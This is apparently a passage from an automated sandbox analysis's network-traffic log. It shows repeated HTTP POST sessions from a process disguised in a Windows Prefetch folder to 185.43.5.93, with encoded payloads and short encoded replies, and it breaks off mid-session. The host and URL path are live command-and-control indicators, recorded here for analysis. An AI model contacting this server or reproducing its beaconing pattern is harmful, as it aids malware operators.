                                                            Data Raw: 39 38 0d 0a 09 1f 25 00 21 2f 3f 03 26 05 05 54 27 3a 08 54 3c 09 31 04 3c 02 04 5b 28 20 27 05 28 3b 39 5a 22 0a 37 04 24 2d 04 56 33 11 04 52 31 24 2e 5e 0c 10 3b 06 21 01 3b 03 28 58 33 59 29 2c 3a 1e 2a 02 38 03 27 3c 2f 11 24 3a 24 01 26 3b 3a 0d 30 2c 2a 03 3d 2a 2e 5d 28 31 30 1f 31 38 2e 56 0b 12 23 1c 29 3a 3c 58 24 04 3b 1f 3d 2d 3a 1f 37 04 3a 5a 37 12 3c 05 36 06 2e 5a 2a 54 28 5e 24 0f 20 0c 27 07 2f 03 23 05 36 0f 25 32 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98%!/?&T':T<1<[( '(;9Z"7$-V3R1$.^;!;(X3Y),:*8'</$:$&;:0,*=*.](1018.V#):<X$;=-:7:Z7<6.Z*T(^$ '/#6%2$P,(U>WT0
                                                            Dec 10, 2024 07:33:15.206686020 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:15.563961983 CET1764OUTData Raw: 5a 53 59 5a 5d 53 53 5a 58 5f 51 55 5a 5a 58 50 56 57 58 58 56 5a 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZSYZ]SSZX_QUZZXPVWXXVZP]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["8!>0U 0!Z;)>^'=7Z(/-#+P)2=+B$-Z0!^" \)1
                                                            Dec 10, 2024 07:33:15.647706985 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:16.023825884 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 25 04 34 3f 20 1e 25 5d 34 0d 33 04 31 0d 3f 09 0c 16 2b 05 2d 05 2b 23 09 04 3f 38 3d 5c 22 24 28 15 27 3d 00 54 30 2f 3a 57 26 1e 2e 5e 0c 10 38 16 21 3b 3b 02 2b 10 3f 12 29 59 3e 5b 28 3c 02 02 27 2f 3f 59 26 29 2b 58 33 38 36 0d 24 5a 3d 5d 29 39 2e 58 28 22 38 1d 32 38 2e 56 0b 12 20 0a 2a 07 38 13 27 2e 33 57 3d 2d 26 55 34 14 26 5b 21 3f 3f 58 35 06 0c 59 2a 1c 20 5e 27 22 27 1f 30 2a 20 5d 20 12 0f 57 26 18 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98%4? %]431?+-+#?8=\"$('=T0/:W&.^8!;;+?)Y>[(<'/?Y&)+X386$Z=])9.X("828.V *8'.3W=-&U4&[!??X5Y* ^'"'0* ] W&$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549872185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:14.846919060 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:15.204730988 CET1048OUTData Raw: 5f 5f 59 5a 5d 5a 56 5c 58 5f 51 55 5a 5a 58 50 56 5b 58 54 56 5a 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: __YZ]ZV\X_QUZZXPV[XTVZPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!-!*33=P4 >8:"3(??S /?V+&(8!$73!^" \)1
                                                            Dec 10, 2024 07:33:16.186197042 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:16.419662952 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549878185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:16.799145937 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549881185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:17.289678097 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:17.642237902 CET1048OUTData Raw: 5f 54 59 58 5d 5a 53 58 58 5f 51 55 5a 5f 58 57 56 5b 58 54 56 59 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _TYX]ZSXX_QUZ_XWV[XTVYPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!;5C035Q #;*$>8+?-T ,(15Q>9E'[4[&(!^" \)%
                                                            Dec 10, 2024 07:33:18.735337019 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:18.854969978 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549888185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:20.778395891 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:21.126540899 CET1048OUTData Raw: 5f 50 59 5f 58 5d 56 58 58 5f 51 55 5a 5f 58 5c 56 51 58 5f 56 51 50 5a 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _PY_X]VXX_QUZ_X\VQX_VQPZPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/2"'> U=\,\6\0-7X("4?#Q)19>]9D'=<[$!^" \)%
                                                            Dec 10, 2024 07:33:22.105420113 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:22.341228008 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549890185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:21.235797882 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:21.595134020 CET1764OUTData Raw: 5f 50 5c 5d 5d 52 53 5b 58 5f 51 55 5a 56 58 57 56 54 58 5b 56 51 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _P\]]RS[X_QUZVXWVTX[VQP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["Y/5$U"#810>#Z<%R# +":*1A3=?'!^" \)
                                                            Dec 10, 2024 07:33:22.507153988 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:22.743738890 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 26 58 34 2f 20 10 31 3b 23 12 30 14 31 09 28 19 26 15 3f 02 36 59 3c 0d 34 14 3c 16 2e 03 22 1a 0e 58 26 3e 36 11 30 3f 0b 0f 24 34 2e 5e 0c 10 38 17 21 01 30 5b 28 00 2b 5a 3d 2f 08 59 2a 3c 3c 03 26 3c 05 12 26 39 38 00 30 06 14 0a 24 2c 3d 59 3e 07 0c 13 3c 1f 0a 56 31 38 2e 56 0b 12 23 1c 3d 00 3c 58 24 3d 33 1d 28 3d 2a 1e 22 39 32 5b 23 5a 20 03 36 06 03 03 3e 0c 38 59 24 1f 28 0a 27 3a 3b 07 23 02 3a 09 31 08 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98&X4/ 1;#01(&?6Y<4<."X&>60?$4.^8!0[(+Z=/Y*<<&<&980$,=Y><V18.V#=<X$=3(=*"92[#Z 6>8Y$(':;#:1$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549896185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:23.135458946 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:23.485750914 CET1048OUTData Raw: 5f 54 59 5f 5d 5d 53 5f 58 5f 51 55 5a 5f 58 50 56 53 58 54 56 5c 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _TY_]]S_X_QUZ_XPVSXTV\P]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\,'U9 ",:!$<+/6#Z3P+19U)=00!^" \)%
                                                            Dec 10, 2024 07:33:24.473460913 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:24.707362890 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549902185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:25.048027039 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:25.407638073 CET1048OUTData Raw: 5a 55 5c 5f 5d 5b 56 5a 58 5f 51 55 5a 56 58 56 56 53 58 59 56 5b 50 5b 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZU\_][VZX_QUZVXVVSXYV[P[PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/E30" 3Y;>3'\?<)V!?#P)!)Q=(9'=708!^" \)
                                                            Dec 10, 2024 07:33:26.375740051 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:26.611702919 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549908185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:26.866580963 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:27.220108032 CET1048OUTData Raw: 5f 53 5c 59 58 5d 56 5a 58 5f 51 55 5a 5d 58 53 56 51 58 5a 56 5b 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _S\YX]VZX_QUZ]XSVQXZV[P]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\;2=$ !U#3=;*-'=?<5V4/W+U)5A0=$[0!^" \)-


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549910185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:27.878232956 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1764
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:28.235726118 CET1764OUTData Raw: 5a 55 5c 5f 58 5f 53 5a 58 5f 51 55 5a 5a 58 55 56 56 58 54 56 5b 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZU\_X_SZX_QUZZXUVVXTV[P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["/"E$9 #5X,:$-+*4,Q<)(;C'-8X0!^" \)1
                                                            Dec 10, 2024 07:33:29.216737032 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:29.451431036 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 39 38 0d 0a 09 1f 25 00 23 59 28 10 24 2b 23 54 24 2a 26 50 2a 27 03 00 3f 02 31 00 3c 0d 23 05 3f 01 31 13 21 34 0e 5e 27 2d 22 52 30 2c 25 0f 25 1e 2e 5e 0c 10 38 17 23 28 2b 02 2b 2e 30 03 29 59 31 05 29 3c 02 05 32 2f 23 5d 27 3a 23 11 33 2b 35 53 24 05 2d 10 29 29 00 5d 28 08 3b 0d 26 12 2e 56 0b 12 23 1f 3d 07 28 13 33 3e 3c 0f 3e 58 21 0d 23 5c 3a 13 20 5a 23 58 36 28 26 13 29 22 34 11 30 31 09 57 33 39 38 5f 34 05 25 15 26 32 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98%#Y($+#T$*&P*'?1<#?1!4^'-"R0,%%.^8#(++.0)Y1)<2/#]':#3+5S$-))](;&.V#=(3><>X!#\: Z#X6(&)"401W398_4%&2$P,(U>WT0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549912185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:28.036525965 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:28.391923904 CET1048OUTData Raw: 5f 55 59 5a 5d 52 53 5a 58 5f 51 55 5a 5f 58 52 56 50 58 5e 56 58 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _UYZ]RSZX_QUZ_XRVPX^VXPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\8"$#1#3&8&^$=?)/ 'Q<25T*8"'>73!^" \)%
                                                            Dec 10, 2024 07:33:29.364178896 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:29.603425026 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549918185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:29.906306982 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:30.251306057 CET1048OUTData Raw: 5f 54 5c 59 5d 59 56 50 58 5f 51 55 5a 58 58 52 56 53 58 59 56 51 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _T\Y]YVPX_QUZXXRVSXYVQP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["]82)D3#)V#U%85'X??%73<!&*&'>'0!^" \)9
                                                            Dec 10, 2024 07:33:31.225570917 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:31.459662914 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549924185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:31.744492054 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:32.095103979 CET1048OUTData Raw: 5a 57 5c 5a 5d 59 56 50 58 5f 51 55 5a 5d 58 54 56 52 58 5a 56 50 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZW\Z]YVPX_QUZ]XTVRXZVPPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["Y/1*$U=4989.\3>#+Y:#/??)+=E$'0!^" \)-
                                                            Dec 10, 2024 07:33:33.074024916 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:33.303427935 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.549929185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:33.556442022 CET303OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
